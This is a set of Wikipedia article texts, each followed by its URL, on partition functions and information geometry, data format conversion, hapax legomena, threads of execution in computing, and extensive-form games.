$$\begin{aligned} \langle f \rangle &= \sum_{x_i} f(x_1, x_2, \dots) P(x_1, x_2, \dots) \\ &= \frac{1}{Z(\beta)} \sum_{x_i} f(x_1, x_2, \dots) \exp\left(-\beta H(x_1, x_2, \dots)\right) \end{aligned}$$
The above notation makes sense for a finite number of discrete random variables. In more general settings, the summations should be replaced with integrals over a probability space.
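The discrete formula translates directly into code. The sketch below uses a hypothetical two-spin system with $H(x_1, x_2) = -x_1 x_2$ and states in $\{-1, +1\}$ (an illustrative choice, not from the text):

```python
import itertools
import math

# Hypothetical two-spin system with states in {-1, +1}.
def H(x):
    return -x[0] * x[1]

def expectation(f, beta, states=(-1, +1)):
    """<f> = (1/Z) * sum_x f(x) * exp(-beta * H(x)) over all configurations x."""
    configs = list(itertools.product(states, repeat=2))
    weights = [math.exp(-beta * H(x)) for x in configs]
    Z = sum(weights)
    return sum(f(x) * w for x, w in zip(configs, weights)) / Z

# For this system <H> works out analytically to -tanh(beta),
# which the direct sum reproduces:
assert abs(expectation(H, 1.0) + math.tanh(1.0)) < 1e-12
```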
Thus, for example, the entropy is given by
$$\begin{aligned} S &= -k_{\text{B}} \langle \ln P \rangle \\ &= -k_{\text{B}} \sum_{x_i} P(x_1, x_2, \dots) \ln P(x_1, x_2, \dots) \\ &= k_{\text{B}} \left(\beta \langle H \rangle + \log Z(\beta)\right) \end{aligned}$$
The Gibbs measure is the unique statistical distribution that maximizes the entropy for a fixed expectation value of the energy; this underlies its use in maximum entropy methods.
The points $\beta$ can be understood to form a space, and specifically, a manifold. Thus, it is reasonable to ask about the structure of this manifold; this is the task of information geometry.
Multiple derivatives with regard to the Lagrange multipliers give rise to a positive semi-definite covariance matrix
$$g_{ij}(\beta) = \frac{\partial^2}{\partial \beta^i \partial \beta^j}\left(-\log Z(\beta)\right) = \left\langle \left(H_i - \langle H_i \rangle\right)\left(H_j - \langle H_j \rangle\right) \right\rangle$$
This matrix is positive semi-definite, and may be interpreted as a metric tensor, specifically, a Riemannian metric. Equipping the space of Lagrange multipliers with a metric in this way turns it into a Riemannian manifold.[1] The study of such manifolds is referred to as information geometry; the metric above is the Fisher information metric. Here, $\beta$ serves as a coordinate on the manifold. It is interesting to compare the above definition to the simpler Fisher information, from which it is inspired.
That the above defines the Fisher information metric can be readily seen by explicitly substituting for the expectation value:
$$\begin{aligned} g_{ij}(\beta) &= \left\langle \left(H_i - \left\langle H_i \right\rangle\right)\left(H_j - \left\langle H_j \right\rangle\right) \right\rangle \\ &= \sum_x P(x) \left(H_i - \left\langle H_i \right\rangle\right)\left(H_j - \left\langle H_j \right\rangle\right) \\ &= \sum_x P(x) \left(H_i + \frac{\partial \log Z}{\partial \beta_i}\right)\left(H_j + \frac{\partial \log Z}{\partial \beta_j}\right) \\ &= \sum_x P(x) \frac{\partial \log P(x)}{\partial \beta^i} \frac{\partial \log P(x)}{\partial \beta^j} \end{aligned}$$
where we've written $P(x)$ for $P(x_1, x_2, \dots)$ and the summation is understood to be over all values of all random variables $X_k$. For continuous-valued random variables, the summations are replaced by integrals, of course.
Curiously, the Fisher information metric can also be understood as the flat-space Euclidean metric, after appropriate change of variables, as described in the main article on it. When the $\beta$ are complex-valued, the resulting metric is the Fubini–Study metric. When written in terms of mixed states, instead of pure states, it is known as the Bures metric.
By introducing artificial auxiliary functions $J_k$ into the partition function, it can then be used to obtain the expectation value of the random variables. Thus, for example, by writing
$$\begin{aligned} Z(\beta, J) &= Z(\beta, J_1, J_2, \dots) \\ &= \sum_{x_i} \exp\left(-\beta H(x_1, x_2, \dots) + \sum_n J_n x_n\right) \end{aligned}$$
one then has
$$\operatorname{E}[x_k] = \langle x_k \rangle = \left.\frac{\partial}{\partial J_k} \log Z(\beta, J)\right|_{J=0}$$
as the expectation value of $x_k$. In the path integral formulation of quantum field theory, these auxiliary functions are commonly referred to as source fields.
Multiple differentiations lead to the connected correlation functions of the random variables. Thus the correlation function $C(x_j, x_k)$ between variables $x_j$ and $x_k$ is given by:
$$C(x_j, x_k) = \left.\frac{\partial}{\partial J_j} \frac{\partial}{\partial J_k} \log Z(\beta, J)\right|_{J=0}$$
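This derivative identity can be checked numerically with finite differences. The sketch below assumes a hypothetical two-spin Hamiltonian $H = -x_1 x_2$ with states in $\{-1, +1\}$ (illustrative, not from the text), for which the connected correlation works out to $\tanh\beta$:

```python
import itertools
import math

def log_Z(beta, J, states=(-1, +1)):
    """log of the source-augmented partition function Z(beta, J1, J2)."""
    # exponent is -beta*H + J1*x1 + J2*x2, with the hypothetical H = -x1*x2:
    return math.log(sum(
        math.exp(beta * x[0] * x[1] + J[0] * x[0] + J[1] * x[1])
        for x in itertools.product(states, repeat=2)))

beta, h = 1.0, 1e-4
# Mixed second derivative d^2 log Z / dJ1 dJ2 at J = 0, by central differences:
C = (log_Z(beta, (h, h)) - log_Z(beta, (h, -h))
     - log_Z(beta, (-h, h)) + log_Z(beta, (-h, -h))) / (4 * h * h)

# Analytically, <x1 x2> - <x1><x2> = tanh(beta) for this system:
assert abs(C - math.tanh(beta)) < 1e-6
```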
For the case where $H$ can be written as a quadratic form involving a differential operator, that is, as
$$H = \frac{1}{2} \sum_n x_n D x_n$$
then the partition function can be understood to be a sum or integral over Gaussians. The correlation function $C(x_j, x_k)$ can be understood to be the Green's function for the differential operator (and generally giving rise to Fredholm theory). In the quantum field theory setting, such functions are referred to as propagators; higher order correlators are called n-point functions; working with them defines the effective action of a theory.
When the random variables are anti-commuting Grassmann numbers, then the partition function can be expressed as a determinant of the operator $D$. This is done by writing it as a Berezin integral (also called Grassmann integral).
Partition functions are used to discuss critical scaling and universality, and are subject to the renormalization group.
|
https://en.wikipedia.org/wiki/Partition_function_(mathematics)
|
Data conversion is the conversion of computer data from one format to another. Throughout a computer environment, data is encoded in a variety of ways. For example, computer hardware is built on the basis of certain standards, which requires that data contains, for example, parity bit checks. Similarly, the operating system is predicated on certain standards for data and file handling. Furthermore, each computer program handles data in a different manner. Whenever any one of these variables is changed, data must be converted in some way before it can be used by a different computer, operating system or program. Even different versions of these elements usually involve different data structures. For example, the changing of bits from one format to another, usually for the purpose of application interoperability or of the capability of using new features, is merely a data conversion. Data conversions may be as simple as the conversion of a text file from one character encoding system to another; or more complex, such as the conversion of office file formats, or the conversion of image formats and audio file formats.
There are many ways in which data is converted within the computer environment. This may be seamless, as in the case of upgrading to a newer version of a computer program. Alternatively, the conversion may require processing by the use of a special conversion program, or it may involve a complex process of going through intermediary stages, or involving complex "exporting" and "importing" procedures, which may include converting to and from a tab-delimited or comma-separated text file. In some cases, a program may recognize several data file formats at the data input stage and then is also capable of storing the output data in several different formats. Such a program may be used to convert a file format. If the source format or target format is not recognized, then at times a third program may be available which permits the conversion to an intermediate format, which can then be reformatted using the first program. There are many possible scenarios.
Before any data conversion is carried out, the user or application programmer should keep a few basics of computing and information theory in mind. These include:
For example, a true color image can easily be converted to grayscale, while the opposite conversion is a painstaking process. Converting a Unix text file to a Microsoft (DOS/Windows) text file involves adding characters, but this does not increase the entropy since it is rule-based; whereas the addition of color information to a grayscale image cannot be reliably done programmatically, as it requires adding new information, so any attempt to add color would require estimation by the computer based on previous knowledge. Converting a 24-bit PNG to a 48-bit one does not add information to it, it only pads existing RGB pixel values with zeroes[citation needed], so that a pixel with a value of FF C3 56, for example, becomes FF00 C300 5600. The conversion makes it possible to change a pixel to have a value of, for instance, FF80 C340 56A0, but the conversion itself does not do that; only further manipulation of the image can. Converting an image or audio file in a lossy format (like JPEG or Vorbis) to a lossless (like PNG or FLAC) or uncompressed (like BMP or WAV) format only wastes space, since the same image with its loss of original information (the artifacts of lossy compression) becomes the target. A JPEG image can never be restored to the quality of the original image from which it was made, no matter how much the user tries the "JPEG Artifact Removal" feature of his or her image manipulation program.
Automatic restoration of information that was lost through a lossy compression process would probably require important advances in artificial intelligence.
Because of these realities of computing and information theory, data conversion is often a complex and error-prone process that requires the help of experts.
Data conversion can occur directly from one format to another, but many applications that convert between multiple formats use an intermediate representation by way of which any source format is converted to its target.[1] For example, it is possible to convert Cyrillic text from KOI8-R to Windows-1251 using a lookup table between the two encodings, but the modern approach is to convert the KOI8-R file to Unicode first and from that to Windows-1251. This is a more manageable approach; rather than needing lookup tables for all possible pairs of character encodings, an application needs only one lookup table for each character set, which it uses to convert to and from Unicode, thereby scaling the number of tables down from hundreds to a few tens.[citation needed]
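Python's codec machinery works exactly this way: byte strings are decoded to Unicode and re-encoded to the target encoding. A minimal sketch:

```python
# Cyrillic sample text, first encoded in KOI8-R to simulate a legacy file:
koi8r_bytes = "привет".encode("koi8_r")

# Pivot conversion: KOI8-R -> Unicode -> Windows-1251.
text = koi8r_bytes.decode("koi8_r")      # step 1: decode source bytes to Unicode
cp1251_bytes = text.encode("cp1251")     # step 2: encode Unicode to the target

# Round-tripping through the target encoding recovers the same text:
assert cp1251_bytes.decode("cp1251") == "привет"
```

The two byte strings differ (the encodings map Cyrillic letters to different byte values), yet both represent the same text via the Unicode pivot.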
Pivotal conversion is similarly used in other areas. Office applications, when employed to convert between office file formats, use their internal, default file format as a pivot. For example, a word processor may convert an RTF file to a WordPerfect file by converting the RTF to OpenDocument and then that to WordPerfect format. An image conversion program does not convert a PCX image to PNG directly; instead, when loading the PCX image, it decodes it to a simple bitmap format for internal use in memory, and when commanded to convert to PNG, that memory image is converted to the target format. An audio converter that converts from FLAC to AAC decodes the source file to raw PCM data in memory first, and then performs the lossy AAC compression on that memory image to produce the target file.
The objective of data conversion is to maintain all of the data, and as much of the embedded information as possible. This can only be done if the target format supports the same features and data structures present in the source file. Conversion of a word processing document to a plain text file necessarily involves loss of formatting information, because plain text format does not support word processing constructs such as marking a word as boldface. For this reason, conversion from one format to another which does not support a feature that is important to the user is rarely carried out, though it may be necessary for interoperability, e.g. converting a file from one version of Microsoft Word to an earlier version to enable transfer and use by other users who do not have the same later version of Word installed on their computer.
Loss of information can be mitigated by approximation in the target format. There is no way of converting a character like ä to ASCII, since the ASCII standard lacks it, but the information may be retained by approximating the character as ae. Of course, this is not an optimal solution, and can impact operations like searching and copying; and if a language makes a distinction between ä and ae, then that approximation does involve loss of information.
Data conversion can also suffer from inexactitude, the result of converting between formats that are conceptually different. The WYSIWYG paradigm, extant in word processors and desktop publishing applications, versus the structural-descriptive paradigm, found in SGML, XML and many applications derived therefrom, like HTML and MathML, is one example. Using a WYSIWYG HTML editor conflates the two paradigms, and the result is HTML files with suboptimal, if not nonstandard, code. In the WYSIWYG paradigm a double linebreak signifies a new paragraph, as that is the visual cue for such a construct, but a WYSIWYG HTML editor will usually convert such a sequence to <BR><BR>, which is structurally no new paragraph at all. As another example, converting from PDF to an editable word processor format is a tough chore, because PDF records the textual information like engraving on stone, with each character given a fixed position and linebreaks hard-coded, whereas word processor formats accommodate text reflow. PDF does not know of a word space character—the space between two letters and the space between two words differ only in quantity. Therefore, a title with ample letter-spacing for effect will usually end up with spaces in the word processor file, for example INTRODUCTION with spacing of 1 em as I N T R O D U C T I O N on the word processor.
Successful data conversion requires thorough knowledge of the workings of both source and target formats. In the case where the specification of a format is unknown, reverse engineering will be needed to carry out conversion. Reverse engineering can achieve close approximation of the original specifications, but errors and missing features can still result.
Data format conversion can also occur at the physical layer of an electronic communication system. Conversion between line codes such as NRZ and RZ can be accomplished when necessary.
Manolescu, Dragos (2006). Pattern Languages of Program Design 5. Upper Saddle River, NJ: Addison-Wesley. ISBN 0321321944.
|
https://en.wikipedia.org/wiki/Data_conversion
|
In corpus linguistics, a hapax legomenon (/ˈhæpəks lɪˈɡɒmɪnɒn/ also /ˈhæpæks/ or /ˈheɪpæks/;[1][2] pl. hapax legomena; sometimes abbreviated to hapax, plural hapaxes) is a word or an expression that occurs only once within a context: either in the written record of an entire language, in the works of an author, or in a single text. The term is sometimes incorrectly used to describe a word that occurs in just one of an author's works but more than once in that particular work. Hapax legomenon is a transliteration of Greek ἅπαξ λεγόμενον, meaning "said once".[3]
The related terms dis legomenon, tris legomenon, and tetrakis legomenon (/ˈdɪs/, /ˈtrɪs/, /ˈtɛtrəkɪs/) respectively refer to double, triple, or quadruple occurrences, but are far less commonly used.
Hapax legomena are quite common, as predicted by Zipf's law,[4] which states that the frequency of any word in a corpus is inversely proportional to its rank in the frequency table. For large corpora, about 40% to 60% of the words are hapax legomena, and another 10% to 15% are dis legomena.[5] Thus, in the Brown Corpus of American English, about half of the 50,000 distinct words are hapax legomena within that corpus.[6]
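Counting hapax (and dis) legomena in a tokenized corpus amounts to reading off a frequency table; a sketch in Python, with a toy token list standing in for a real corpus such as Brown:

```python
from collections import Counter

def legomena(tokens, k=1):
    """Return the words occurring exactly k times (k=1: hapax, k=2: dis)."""
    counts = Counter(tokens)
    return sorted(word for word, count in counts.items() if count == k)

# Toy corpus, an illustrative stand-in for a real tokenized corpus:
tokens = "the cat sat on the mat and the dog sat too".split()
assert legomena(tokens, 1) == ["and", "cat", "dog", "mat", "on", "too"]
assert legomena(tokens, 2) == ["sat"]
```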
Hapax legomenon refers to the appearance of a word or an expression in a body of text, not to either its origin or its prevalence in speech. It thus differs from a nonce word, which may never be recorded, may find currency and may be widely recorded, or may appear several times in the work which coins it, and so on.
Hapax legomena in ancient texts are usually difficult to decipher, since it is easier to infer meaning from multiple contexts than from just one. For example, many of the remaining undeciphered Mayan glyphs are hapax legomena, and Biblical (particularly Hebrew; see § Hebrew) hapax legomena sometimes pose problems in translation. Hapax legomena also pose challenges in natural language processing.[7]
Some scholars consider hapax legomena useful in determining the authorship of written works. P. N. Harrison, in The Problem of the Pastoral Epistles (1921),[8] made hapax legomena popular among Bible scholars when he argued that there are considerably more of them in the three Pastoral Epistles than in other Pauline Epistles. He argued that the number of hapax legomena in a putative author's corpus indicates his or her vocabulary and is characteristic of the author as an individual.
Harrison's theory has faded in significance due to a number of problems raised by other scholars. For example, in 1896, W. P. Workman found the following numbers of hapax legomena in each Pauline Epistle:
At first glance, the last three totals (for the Pastoral Epistles) are not out of line with the others.[9] To take account of the varying length of the epistles, Workman also calculated the average number of hapax legomena per page of the Greek text, which ranged from 3.6 to 13, as summarized in the diagram on the right.[9] Although the Pastoral Epistles have more hapax legomena per page, Workman found the differences to be moderate in comparison to the variation among other Epistles. This was reinforced when Workman looked at several plays by Shakespeare, which showed similar variations (from 3.4 to 10.4 per page of Irving's one-volume edition), as summarized in the second diagram on the right.[9]
Apart from author identity, there are several other factors that can explain the number of hapax legomena in a work:[10]
In the particular case of the Pastoral Epistles, all of these variables are quite different from those in the rest of the Pauline corpus, and hapax legomena are no longer widely accepted as strong indicators of authorship; those who reject Pauline authorship of the Pastorals rely on other arguments.[11]
There are also subjective questions over whether two forms amount to "the same word": dog vs. dogs, clue vs. clueless, sign vs. signature; many other gray cases also arise. The Jewish Encyclopedia points out that, although there are 1,500 hapaxes in the Hebrew Bible, only about 400 are not obviously related to other attested word forms.[12]
A final difficulty with the use of hapax legomena for authorship determination is that there is considerable variation among works known to be by a single author, and disparate authors often show similar values. In other words, hapax legomena are not a reliable indicator. Authorship studies now usually use a wide range of measures to look for patterns rather than relying upon single measurements.
In the fields of computational linguistics and natural language processing (NLP), especially corpus linguistics and machine-learned NLP, it is common to disregard hapax legomena (and sometimes other infrequent words), as they are likely to have little value for computational techniques. This disregard has the added benefit of significantly reducing the memory use of an application, since, by Zipf's law, many words are hapax legomena.[13]
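A common preprocessing step implementing this practice is to replace all tokens below a frequency threshold with a single out-of-vocabulary marker before training; a minimal sketch, where the threshold and marker name are illustrative assumptions rather than any fixed convention:

```python
from collections import Counter

def prune_rare(tokens, min_count=2, unk="<unk>"):
    """Replace tokens occurring fewer than min_count times with an
    out-of-vocabulary marker (threshold and marker are illustrative)."""
    counts = Counter(tokens)
    return [t if counts[t] >= min_count else unk for t in tokens]

print(prune_rare(["to", "be", "or", "not", "to", "be"]))
# ['to', 'be', '<unk>', '<unk>', 'to', 'be']
```

Because hapax legomena dominate the tail of the frequency distribution, even `min_count=2` typically shrinks the vocabulary by roughly half.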
The following are some examples of hapax legomena in languages or corpora.
In the Qurʾān:
Classical Chinese and Japanese literature contains many Chinese characters that feature only once in the corpus, and their meaning and pronunciation have often been lost. Known in Japanese as kogo (孤語), literally "lonely characters", these can be considered a type of hapax legomenon.[15] For example, the Classic of Poetry (c. 1000 BC) uses the character 篪 exactly once, in the verse 「伯氏吹塤, 仲氏吹篪」, and it was only through the discovery of a description by Guo Pu (276–324 AD) that the character could be associated with a specific type of ancient flute.
It is fairly common for authors to "coin" new words to convey a particular meaning or for the sake of entertainment, without any suggestion that they are "proper" words. For example, P. G. Wodehouse and Lewis Carroll frequently coined novel words. Indexy, below, appears to be an example of this.
According to classical scholar Clyde Pharr, "the Iliad has 1097 hapax legomena, while the Odyssey has 868".[19] Others have defined the term differently, however, and count as few as 303 in the Iliad and 191 in the Odyssey.[20]
The number of distinct hapax legomena in the Hebrew Bible is 1,480 (out of a total of 8,679 distinct words used).[26]: 112 However, due to Hebrew roots, suffixes and prefixes, only 400 are "true" hapax legomena.[12] A full list can be seen at the Jewish Encyclopedia entry for "Hapax Legomena".[12]
Some examples include:
|
https://en.wikipedia.org/wiki/Hapax_legomenon
|
In computer science, a thread of execution is the smallest sequence of programmed instructions that can be managed independently by a scheduler, which is typically a part of the operating system.[1] In many cases, a thread is a component of a process.
The multiple threads of a given process may be executed concurrently (via multithreading capabilities), sharing resources such as memory, while different processes do not share these resources. In particular, the threads of a process share its executable code and the values of its dynamically allocated variables and non-thread-local global variables at any given time.
The implementation of threads and processes differs between operating systems.[2][page needed]
Threads made an early appearance under the name of "tasks" in IBM's batch processing operating system, OS/360, in 1967. It provided users with three available configurations of the OS/360 control system, of which Multiprogramming with a Variable Number of Tasks (MVT) was one. Saltzer (1966) credits Victor A. Vyssotsky with the term "thread".[3]
The use of threads in software applications became more common in the early 2000s as CPUs began to utilize multiple cores. Applications wishing to take advantage of multiple cores for performance advantages were required to employ concurrency to utilize the multiple cores.[4]
Scheduling can be done at the kernel level or user level, and multitasking can be done preemptively or cooperatively. This yields a variety of related concepts.
At the kernel level, a process contains one or more kernel threads, which share the process's resources, such as memory and file handles – a process is a unit of resources, while a thread is a unit of scheduling and execution. Kernel scheduling is typically uniformly done preemptively or, less commonly, cooperatively. At the user level a process such as a runtime system can itself schedule multiple threads of execution. If these do not share data, as in Erlang, they are usually analogously called processes,[5] while if they share data they are usually called (user) threads, particularly if preemptively scheduled. Cooperatively scheduled user threads are known as fibers; different processes may schedule user threads differently. User threads may be executed by kernel threads in various ways (one-to-one, many-to-one, many-to-many). The term "light-weight process" variously refers to user threads or to kernel mechanisms for scheduling user threads onto kernel threads.
A process is a "heavyweight" unit of kernel scheduling, as creating, destroying, and switching processes is relatively expensive. Processes own resources allocated by the operating system. Resources include memory (for both code and data), file handles, sockets, device handles, windows, and a process control block. Processes are isolated by process isolation, and do not share address spaces or file resources except through explicit methods such as inheriting file handles or shared memory segments, or mapping the same file in a shared way – see interprocess communication. Creating or destroying a process is relatively expensive, as resources must be acquired or released. Processes are typically preemptively multitasked, and process switching is relatively expensive, beyond the basic cost of context switching, due to issues such as cache flushing (in particular, process switching changes virtual memory addressing, causing invalidation and thus flushing of an untagged translation lookaside buffer (TLB), notably on x86).
A kernel thread is a "lightweight" unit of kernel scheduling. At least one kernel thread exists within each process. If multiple kernel threads exist within a process, then they share the same memory and file resources. Kernel threads are preemptively multitasked if the operating system's process scheduler is preemptive. Kernel threads do not own resources except for a stack, a copy of the registers including the program counter, and thread-local storage (if any), and are thus relatively cheap to create and destroy. Thread switching is also relatively cheap: it requires a context switch (saving and restoring registers and stack pointer), but does not change virtual memory and is thus cache-friendly (leaving the TLB valid). The kernel can assign one or more software threads to each core in a CPU (it being able to assign itself multiple software threads depending on its support for multithreading), and can swap out threads that get blocked. However, kernel threads take much longer than user threads to be swapped.
Threads are sometimes implemented in userspace libraries, thus called user threads. The kernel is unaware of them, so they are managed and scheduled in userspace. Some implementations base their user threads on top of several kernel threads, to benefit from multi-processor machines (M:N model). User threads as implemented by virtual machines are also called green threads.
As user thread implementations are typically entirely in userspace, context switching between user threads within the same process is extremely efficient because it does not require any interaction with the kernel at all: a context switch can be performed by locally saving the CPU registers used by the currently executing user thread or fiber and then loading the registers required by the user thread or fiber to be executed. Since scheduling occurs in userspace, the scheduling policy can be more easily tailored to the requirements of the program's workload.
However, the use of blocking system calls in user threads (as opposed to kernel threads) can be problematic. If a user thread or a fiber performs a system call that blocks, the other user threads and fibers in the process are unable to run until the system call returns. A typical example of this problem is when performing I/O: most programs are written to perform I/O synchronously. When an I/O operation is initiated, a system call is made, and does not return until the I/O operation has been completed. In the intervening period, the entire process is "blocked" by the kernel and cannot run, which starves other user threads and fibers in the same process from executing.
A common solution to this problem (used, in particular, by many green threads implementations) is providing an I/O API that implements an interface that blocks the calling thread, rather than the entire process, by using non-blocking I/O internally, and scheduling another user thread or fiber while the I/O operation is in progress. Similar solutions can be provided for other blocking system calls. Alternatively, the program can be written to avoid the use of synchronous I/O or other blocking system calls (in particular, using non-blocking I/O, including lambda continuations and/or async/await primitives[6]).
Fibers are an even lighter unit of scheduling which are cooperatively scheduled: a running fiber must explicitly "yield" to allow another fiber to run, which makes their implementation much easier than kernel or user threads. A fiber can be scheduled to run in any thread in the same process. This permits applications to gain performance improvements by managing scheduling themselves, instead of relying on the kernel scheduler (which may not be tuned for the application). Some research implementations of the OpenMP parallel programming model implement their tasks through fibers.[7][8] Closely related to fibers are coroutines, with the distinction being that coroutines are a language-level construct, while fibers are a system-level construct.
Threads differ from traditional multitasking operating-system processes in several ways:
Systems such as Windows NT and OS/2 are said to have cheap threads and expensive processes; in other operating systems there is not so great a difference except in the cost of an address-space switch, which on some architectures (notably x86) results in a translation lookaside buffer (TLB) flush.
Advantages and disadvantages of threads vs processes include:
Operating systems schedule threads either preemptively or cooperatively. Multi-user operating systems generally favor preemptive multithreading for its finer-grained control over execution time via context switching. However, preemptive scheduling may context-switch threads at moments unanticipated by programmers, thus causing lock convoy, priority inversion, or other side-effects. In contrast, cooperative multithreading relies on threads to relinquish control of execution, thus ensuring that threads run to completion. This can cause problems if a cooperatively multitasked thread blocks by waiting on a resource or if it starves other threads by not yielding control of execution during intensive computation.
Until the early 2000s, most desktop computers had only one single-core CPU, with no support for hardware threads, although threads were still used on such computers because switching between threads was generally still quicker than full-process context switches. In 2002, Intel added support for simultaneous multithreading to the Pentium 4 processor, under the name hyper-threading; in 2005, they introduced the dual-core Pentium D processor and AMD introduced the dual-core Athlon 64 X2 processor.
Systems with a single processor generally implement multithreading by time slicing: the central processing unit (CPU) switches between different software threads. This context switching usually occurs frequently enough that users perceive the threads or tasks as running in parallel (for popular server/desktop operating systems, the maximum time slice of a thread, when other threads are waiting, is often limited to 100–200 ms). On a multiprocessor or multi-core system, multiple threads can execute in parallel, with every processor or core executing a separate thread simultaneously; on a processor or core with hardware threads, separate software threads can also be executed concurrently by separate hardware threads.
Threads created by the user in a 1:1 correspondence with schedulable entities in the kernel[9] are the simplest possible threading implementation. OS/2 and Win32 used this approach from the start, while on Linux the GNU C Library implements this approach (via the NPTL or older LinuxThreads). This approach is also used by Solaris, NetBSD, FreeBSD, macOS, and iOS.
An M:1 model implies that all application-level threads map to one kernel-level scheduled entity;[9] the kernel has no knowledge of the application threads. With this approach, context switching can be done very quickly and, in addition, it can be implemented even on simple kernels which do not support threading. One of the major drawbacks, however, is that it cannot benefit from the hardware acceleration on multithreaded processors or multi-processor computers: there is never more than one thread being scheduled at the same time.[9] For example, if one of the threads needs to execute an I/O request, the whole process is blocked and the threading advantage cannot be used. GNU Portable Threads uses user-level threading, as does State Threads.
M:N maps some number M of application threads onto some number N of kernel entities,[9] or "virtual processors". This is a compromise between kernel-level ("1:1") and user-level ("N:1") threading. In general, "M:N" threading systems are more complex to implement than either kernel or user threads, because changes to both kernel and user-space code are required[clarification needed]. In the M:N implementation, the threading library is responsible for scheduling user threads on the available schedulable entities; this makes context switching of threads very fast, as it avoids system calls. However, this increases complexity and the likelihood of priority inversion, as well as suboptimal scheduling without extensive (and expensive) coordination between the userland scheduler and the kernel scheduler.
SunOS 4.x implemented light-weight processes or LWPs. NetBSD 2.x+ and DragonFly BSD implement LWPs as kernel threads (1:1 model). SunOS 5.2 through SunOS 5.8, as well as NetBSD 2 to NetBSD 4, implemented a two-level model, multiplexing one or more user-level threads on each kernel thread (M:N model). SunOS 5.9 and later, as well as NetBSD 5, eliminated user threads support, returning to a 1:1 model.[10] FreeBSD 5 implemented the M:N model. FreeBSD 6 supported both 1:1 and M:N; users could choose which one should be used with a given program using /etc/libmap.conf. Starting with FreeBSD 7, 1:1 became the default. FreeBSD 8 no longer supports the M:N model.
In computer programming, single-threading is the processing of one instruction at a time.[11] In the formal analysis of the variables' semantics and process state, the term single threading can be used differently to mean "backtracking within a single thread", which is common in the functional programming community.[12]
Multithreading is mainly found in multitasking operating systems. Multithreading is a widespread programming and execution model that allows multiple threads to exist within the context of one process. These threads share the process's resources, but are able to execute independently. The threaded programming model provides developers with a useful abstraction of concurrent execution. Multithreading can also be applied to one process to enable parallel execution on a multiprocessing system.
Multithreading libraries tend to provide a function call to create a new thread, which takes a function as a parameter. A concurrent thread is then created which starts running the passed function and ends when the function returns. The thread libraries also offer data synchronization functions.
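The create-and-join pattern just described can be sketched with Python's standard threading module (the worker function is illustrative): each thread starts running the passed function and ends when that function returns.

```python
import threading

results = []

def worker(n):
    results.append(n * n)   # list.append is atomic in CPython

threads = [threading.Thread(target=worker, args=(i,)) for i in range(4)]
for t in threads:
    t.start()               # begin concurrent execution of worker(i)
for t in threads:
    t.join()                # wait for every thread to finish
print(sorted(results))      # [0, 1, 4, 9]
```

Other libraries (POSIX pthreads, C++ std::thread, Java's Thread) expose the same basic shape: pass a function in, start, then join.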
Threads in the same process share the same address space. This allows concurrently running code to couple tightly and conveniently exchange data without the overhead or complexity of IPC. When shared between threads, however, even simple data structures become prone to race conditions if they require more than one CPU instruction to update: two threads may end up attempting to update the data structure at the same time and find it unexpectedly changing underfoot. Bugs caused by race conditions can be very difficult to reproduce and isolate.
To prevent this, threading application programming interfaces (APIs) offer synchronization primitives such as mutexes to lock data structures against concurrent access. On uniprocessor systems, a thread running into a locked mutex must sleep and hence trigger a context switch. On multi-processor systems, the thread may instead poll the mutex in a spinlock. Both of these may sap performance and force processors in symmetric multiprocessing (SMP) systems to contend for the memory bus, especially if the granularity of the locking is too fine.
Other synchronization APIs include condition variables, critical sections, semaphores, and monitors.
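The shared-counter case is the classic illustration of such a race and its repair: `counter += 1` is a read-modify-write sequence, so concurrent increments can be lost unless a mutex makes the sequence atomic. A minimal sketch with Python's threading primitives:

```python
import threading

counter = 0
lock = threading.Lock()

def increment(times):
    global counter
    for _ in range(times):
        with lock:          # mutex makes the read-modify-write sequence atomic
            counter += 1

threads = [threading.Thread(target=increment, args=(100_000,)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter)  # 400000; without the lock, some updates could be lost
```

Removing the `with lock:` line reintroduces the race, and the final count can then fall short in ways that differ from run to run, which is exactly why such bugs are hard to reproduce.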
A popular programming pattern involving threads is that of thread pools, where a set number of threads are created at startup and then wait for tasks to be assigned. When a new task arrives, one of the waiting threads wakes up, completes the task, and goes back to waiting. This avoids the relatively expensive thread creation and destruction functions for every task performed and takes thread management out of the application developer's hands, leaving it to a library or the operating system that is better suited to optimize thread management.
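Many standard libraries ship this pattern directly; for example, Python's concurrent.futures provides a thread pool whose workers are created once and reused across tasks (the task function here is an illustrative stand-in):

```python
from concurrent.futures import ThreadPoolExecutor

def work(n):
    return n * n   # stand-in for an I/O-bound task

with ThreadPoolExecutor(max_workers=3) as pool:   # 3 threads created once, reused
    out = list(pool.map(work, range(5)))
print(out)  # [0, 1, 4, 9, 16]
```

The pool sizes, queues, and recycles its worker threads internally, so the application submits tasks rather than managing thread lifetimes itself.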
Multithreaded applications have the following advantages vs single-threaded ones:
Multithreaded applications have the following drawbacks:
Many programming languages support threading in some capacity.
|
https://en.wikipedia.org/wiki/Thread_(computing)
|
In game theory, an extensive-form game is a specification of a game allowing for the explicit representation of a number of key aspects, like the sequencing of players' possible moves, their choices at every decision point, the (possibly imperfect) information each player has about the other player's moves when they make a decision, and their payoffs for all possible game outcomes. Extensive-form games also allow for the representation of incomplete information in the form of chance events modeled as "moves by nature". Extensive-form representations differ from normal-form in that they provide a more complete description of the game in question, whereas normal-form simply boils the game down into a payoff matrix.
Some authors, particularly in introductory textbooks, initially define the extensive-form game as being just a game tree with payoffs (no imperfect or incomplete information), and add the other elements in subsequent chapters as refinements. Whereas the rest of this article follows this gentle approach with motivating examples, we present upfront the finite extensive-form games as (ultimately) constructed here. This general definition was introduced by Harold W. Kuhn in 1953, who extended an earlier definition of von Neumann from 1928. Following the presentation from Hart (1992), an n-player extensive-form game thus consists of the following:
A play is thus a path through the tree from the root to a terminal node. At any given non-terminal node belonging to Chance, an outgoing branch is chosen according to the probability distribution. At any rational player's node, the player must choose one of the equivalence classes for the edges, which determines precisely one outgoing edge except (in general) the player doesn't know which one is being followed. (An outside observer knowing every other player's choices up to that point, and the realization of Nature's moves, can determine the edge precisely.) A pure strategy for a player thus consists of a selection: choosing precisely one class of outgoing edges for every information set (of his). In a game of perfect information, the information sets are singletons. It is less evident how payoffs should be interpreted in games with Chance nodes. It is assumed that each player has a von Neumann–Morgenstern utility function defined for every game outcome; this assumption entails that every rational player will evaluate an a priori random outcome by its expected utility.
The above presentation, while precisely defining the mathematical structure over which the game is played, elides the more technical discussion of formalizing statements about how the game is played, like "a player cannot distinguish between nodes in the same information set when making a decision". These can be made precise using epistemic modal logic; see Shoham & Leyton-Brown (2009, chpt. 13) for details.
